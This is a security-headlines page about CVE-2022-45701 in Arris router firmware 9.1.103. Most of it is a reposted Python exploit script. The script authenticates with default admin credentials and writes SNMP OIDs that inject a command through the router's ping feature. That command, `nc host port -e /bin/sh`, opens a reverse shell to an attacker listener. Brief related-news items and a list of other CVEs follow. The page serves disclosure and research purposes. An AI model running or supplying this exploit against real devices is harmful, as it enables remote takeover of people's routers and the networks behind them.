Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-45701: Arris Router Firmware 9.1.103 Remote Code Execution ≈ Packet Storm

Arris TG2482A firmware through 9.1.103GEM9 allow Remote Code Execution (RCE) via the ping utility feature.

CVE
Open in Source
#rce#auth
c# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)# Date: 17/11/2022# Exploit Author: Yerodin Richards# Vendor Homepage: https://www.commscope.com/# Version: 9.1.103# Tested on: TG2482A, TG2492, SBG10# CVE : CVE-2022-45701import requestsimport base64router_host = "http://192.168.0.1"username = "admin"password = "password"lhost = "192.168.0.6"lport = 80def main():    print("Authorizing...")    cookie = get_cookie(gen_header(username, password))    if cookie == '':        print("Failed to authorize")        exit(-1)    print("Generating Payload...")    payload = gen_payload(lhost, lport)    print("Sending Payload...")    send_payload(payload, cookie)    print("Done, check shell..")def gen_header(u, p):    return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")def no_encode_params(params):    return  "&".join("%s=%s" % (k,v) for k,v in params.items())def get_cookie(header):    url = router_host+"/login"    params = no_encode_params({"arg":header, "_n":1})    resp=requests.get(url, params=params)    return resp.content.decode('UTF-8')def set_oid(oid, cookie):    url = router_host+"/snmpSet"    params = no_encode_params({"oid":oid, "_n":1})    cookies = {"credential":cookie}    requests.get(url, params=params, cookies=cookies)def gen_payload(h, p):    return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"def send_payload(payload, cookie):    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)    set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)    if __name__ == '__main__':    main()

Related news

Arris router vulnerability could lead to complete takeover

Categories: Exploits and vulnerabilities Categories: News Tags: Yerodin Richards Tags: Arris Tags: routre Tags: CVE-2022-45701 Tags: default credentials A security researcher found an authenticated remote code execution vulnerability in very wide-spread Arris router models. (Read more...) The post Arris router vulnerability could lead to complete takeover appeared first on Malwarebytes Labs.

Arris Router Firmware 9.1.103 Remote Code Execution

Arris Router Firmware version 9.1.103 authenticated remote code execution exploit that has been tested against the TG2482A, TG2492, and SBG10 models.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE